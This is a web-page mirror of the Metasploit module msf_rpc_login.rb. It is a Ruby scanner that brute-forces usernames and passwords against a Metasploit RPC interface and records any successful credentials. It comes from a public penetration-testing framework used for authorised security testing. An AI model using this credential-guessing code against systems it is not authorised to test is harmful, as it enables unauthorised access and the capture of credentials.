CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/msf/msf_rpc_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456class MetasploitModule < Msf::Auxiliary7include Msf::Exploit::Remote::Tcp8include Msf::Auxiliary::Report9include Msf::Auxiliary::AuthBrute10include Msf::Auxiliary::Scanner1112def initialize(info = {})13super(update_info(info,14'Name' => 'Metasploit RPC Interface Login Utility',15'Description' => %q{16This module simply attempts to login to a17Metasploit RPC interface using a specific18user/pass.19},20'Author' => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],21'License' => MSF_LICENSE22))2324register_options(25[26Opt::RPORT(55553),27OptString.new('USERNAME', [true, "A specific username to authenticate as. Default is msf", "msf"]),28OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]),29OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true])30])3132register_autofilter_ports([3790])33end3435def run_host(ip)36begin37@rpc = Msf::RPC::Client.new(38:host => rhost,39:port => rport,40:ssl => ssl41)42rescue ::Interrupt43raise $!44rescue => e45vprint_error("Cannot create RPC client : #{e}")46return47end4849each_user_pass do |user, pass|50do_login(user, pass)51end52end5354def report_cred(opts)55service_data = {56address: opts[:ip],57port: opts[:port],58service_name: opts[:service_name],59protocol: 'tcp',60workspace_id: myworkspace_id61}6263credential_data = {64origin_type: :service,65module_fullname: fullname,66username: opts[:user],67private_data: opts[:password],68private_type: :password69}.merge(service_data)7071login_data = {72last_attempted_at: Time.now,73core: create_credential(credential_data),74status: Metasploit::Model::Login::Status::SUCCESSFUL,75proof: opts[:proof]76}.merge(service_data)7778create_credential_login(login_data)79end8081def do_login(user = 'msf', pass = 'msf')82vprint_status("Trying username:'#{user}' with password:'#{pass}'")83begin84res = @rpc.login(user, pass)85if res86print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")87report_cred(88ip: rhost,89port: rport,90service_name: 'msf-rpc',91user: user,92password: pass93)94return :next_user95end96rescue Rex::ConnectionRefused => e97print_error("Connection refused : #{e}")98return :abort99rescue => e100vprint_status("#{peer} - Bad login")101return :skip_pass102end103ensure104@rpc.close105end106end107108109